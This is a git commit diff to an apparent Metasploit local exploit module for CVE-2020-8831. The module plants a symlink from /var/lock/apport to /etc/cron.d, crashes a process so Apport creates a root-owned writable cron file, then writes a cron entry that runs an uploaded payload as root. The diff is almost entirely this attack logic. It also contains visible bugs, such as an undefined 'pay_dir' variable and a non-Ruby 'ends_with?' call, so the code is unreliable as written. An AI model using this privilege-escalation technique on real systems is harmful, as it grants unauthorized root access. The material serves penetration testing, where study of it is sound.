Add instance vars, cleanup file writes

gardnerapp · gardnerapp · commit c148d3a02dcd · 2025-02-21T19:33:48.000-05:00
diff --git a/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb b/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
@@ -11,9 +11,6 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
 
-  # TODO: targets in the initialize method and how they work
-  # TODO other priv esc vectors, startup folders, periodic scripts
-  # change name to apport exploit, checking lesser version of apport in check method, are they vunerable?
   def initialize(info = {})
     super(
       update_info(
@@ -29,7 +26,7 @@ def initialize(info = {})
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'gardnerapp' # mirageinfosec.cloud
+          'gardnerapp'
         ],
         'References' => [
           [
@@ -99,9 +96,10 @@ def check
     CheckCode::Safe
   end
 
-  # hijack symlink by creating apport crash
+  # Crash Apport and hijack a symlink
+  # this will creat a rwx /etc/cron.d/lock owned by root
   def hijack_apport
-    # Create symlink, this will create a rwxrwxrwx root:root /etc/cron.d/lock
+    
     print_status("Creating symlink...")
     link = cmd_exec ('ln -s /etc/cron.d /var/lock/apport')
     print_status(link)
@@ -110,23 +108,24 @@ def hijack_apport
     print_status("Triggering crash...")
     cmd_exec 'sleep 10s & kill -11 $!'
 
-    # need method for seeing if file is owned by root and combine with and gate
-    # TODO want to check if file is root owned to ensure exploit workedd 
-    if !writable?('/etc/cron.d/lock') 
+    @cron = '/etc/cron.d/lock'
+
+    # Make sure it's writable and owned by root
+    unless exist?(@cron) 
       fail_with(Failure::NotFound, 'Exploit was unable to create a crontab owned by root.')
     else
       print_good("Successfully created /etc/cron.d/lock")
     end
   end
 
   def write_payload
-    print_status 'Uploading payload'
+    print_status 'Uploading payload..'
 
-    payload_dir = datastore['WritableDir']
+    payload_dir = datastore['Writable_Dir']
 
     payload_dir += '/' unless pay_dir.ends_with? '/'
 
-    payload_file = datastore['PayloadFilename']
+    payload_file = datastore['Payload_Filename']
 
     @payload_dest = "#{payload_dir}#{payload_file}"
 
@@ -140,9 +139,10 @@ def write_payload
   end
 
   def write_cron
-    cron_file = '/etc/cron.d/lock'
     cron_interval = datastore['CRON_INTERVAL']
-    write_file(cron_file, "#{cron_interval} #{@payload_dest}")
+    data = "#{cron_interval} #{@payload_dest}"
+    write_file(@cron, data)
+    print_good "Successfully wrote crontab!"
   end
 
   def exploit
